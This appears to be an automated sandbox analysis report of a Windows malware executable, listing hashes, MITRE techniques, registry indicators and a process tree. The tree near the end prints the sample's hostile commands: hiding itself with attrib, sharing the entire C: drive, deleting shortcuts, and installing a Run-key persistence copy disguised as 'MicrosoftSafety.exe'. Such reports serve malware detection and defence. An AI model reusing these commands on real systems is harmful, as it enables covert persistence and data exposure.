bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941

Analysis

max time kernel
167s
max time network
192s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
05/12/2022, 22:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe
Size

276KB
MD5

6cdcb0900130b5cce6a2ae36868c1d9b
SHA1

05e2afbd095a163e6fac8822ed49ca565b688b39
SHA256

bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941
SHA512

5f4cb49137167656ca482fd4e1e98c02a7e4e51a65a70a48179183e36a87fdf91e0596273255e0d931d6205fa4c187bd078aefc20ea35dd1892aff643a7d21a0
SSDEEP

1536:MPz43i6EJ02LyV3kFdp+0zI1ZBjhRDmmHeIcinLJcoHQHF3i6EJ02LyV3rE:czLyV3kF21im+YLzLyV3I

Score

10^/10

evasion persistence

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
5056	attrib.exe
4712	attrib.exe
2708	attrib.exe
4780	attrib.exe
3224	attrib.exe
1320	attrib.exe

Adds Run key to start application 2 TTPs 58 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = " C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program File\\Microsoft\\MicrosoftSafety.exe"	reg.exe

Drops autorun.inf file 1 TTPs 3 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe
File opened for modification	C:\autorun.inf	attrib.exe
File opened for modification	C:\autorun.inf	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Network\SharingHandler	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Network\SharingHandler\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	cmd.exe

Runs net.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe
1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1604 wrote to memory of 1664	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	84
PID 1604 wrote to memory of 1664	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	84
PID 1604 wrote to memory of 1664	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	84
PID 1604 wrote to memory of 3624	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	85
PID 1604 wrote to memory of 3624	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	85
PID 1604 wrote to memory of 3624	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	85
PID 1604 wrote to memory of 1200	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	89
PID 1604 wrote to memory of 1200	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	89
PID 1604 wrote to memory of 1200	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	89
PID 1604 wrote to memory of 3824	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	88
PID 1604 wrote to memory of 3824	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	88
PID 1604 wrote to memory of 3824	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	88
PID 1604 wrote to memory of 3816	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	90
PID 1604 wrote to memory of 3816	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	90
PID 1604 wrote to memory of 3816	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	90
PID 1604 wrote to memory of 3648	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	98
PID 1604 wrote to memory of 3648	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	98
PID 1604 wrote to memory of 3648	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	98
PID 1604 wrote to memory of 3176	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	93
PID 1604 wrote to memory of 3176	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	93
PID 1604 wrote to memory of 3176	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	93
PID 1604 wrote to memory of 1456	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	94
PID 1604 wrote to memory of 1456	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	94
PID 1604 wrote to memory of 1456	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	94
PID 1604 wrote to memory of 1772	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	96
PID 1604 wrote to memory of 1772	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	96
PID 1604 wrote to memory of 1772	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	96
PID 1604 wrote to memory of 1316	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	99
PID 1604 wrote to memory of 1316	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	99
PID 1604 wrote to memory of 1316	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	99
PID 1604 wrote to memory of 2320	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	101
PID 1604 wrote to memory of 2320	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	101
PID 1604 wrote to memory of 2320	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	101
PID 1604 wrote to memory of 2340	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	105
PID 1604 wrote to memory of 2340	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	105
PID 1604 wrote to memory of 2340	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	105
PID 1604 wrote to memory of 2640	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	106
PID 1604 wrote to memory of 2640	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	106
PID 1604 wrote to memory of 2640	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	106
PID 1604 wrote to memory of 4756	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	109
PID 1604 wrote to memory of 4756	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	109
PID 1604 wrote to memory of 4756	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	109
PID 1604 wrote to memory of 4112	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	117
PID 1604 wrote to memory of 4112	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	117
PID 1604 wrote to memory of 4112	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	117
PID 1604 wrote to memory of 3116	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	112
PID 1604 wrote to memory of 3116	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	112
PID 1604 wrote to memory of 3116	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	112
PID 1604 wrote to memory of 4688	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	113
PID 1604 wrote to memory of 4688	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	113
PID 1604 wrote to memory of 4688	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	113
PID 1604 wrote to memory of 4344	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	115
PID 1604 wrote to memory of 4344	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	115
PID 1604 wrote to memory of 4344	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	115
PID 1604 wrote to memory of 1008	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	118
PID 1604 wrote to memory of 1008	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	118
PID 1604 wrote to memory of 1008	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	118
PID 1604 wrote to memory of 4320	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	119
PID 1604 wrote to memory of 4320	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	119
PID 1604 wrote to memory of 4320	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	119
PID 1604 wrote to memory of 4220	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	120
PID 1604 wrote to memory of 4220	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	120
PID 1604 wrote to memory of 4220	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	120
PID 1604 wrote to memory of 1652	1604	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	128

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3224	attrib.exe
1320	attrib.exe
2016	attrib.exe
5056	attrib.exe
4712	attrib.exe
2708	attrib.exe
4780	attrib.exe

C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe
"C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe"
1⤵
- Drops autorun.inf file
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941"
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b /max .
  2⤵
  - Modifies registry class
  PID:3624
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd C:\ & del *.lnk
  2⤵
  PID:3824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c tskill taskmagr
  2⤵
  PID:1200
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net share SYS_C$=C:\
  2⤵
  PID:3816
- - C:\Windows\SysWOW64\net.exe
    net share SYS_C$=C:\
    3⤵
    PID:400
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c MKDIR "C:\Program File\Microsoft"
  2⤵
  PID:3176
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe" "C:\Program File\Microsoft\MicrosoftSafety.exe"
  2⤵
  PID:1456
- C:\Windows\SysWOW64\cmd.exe
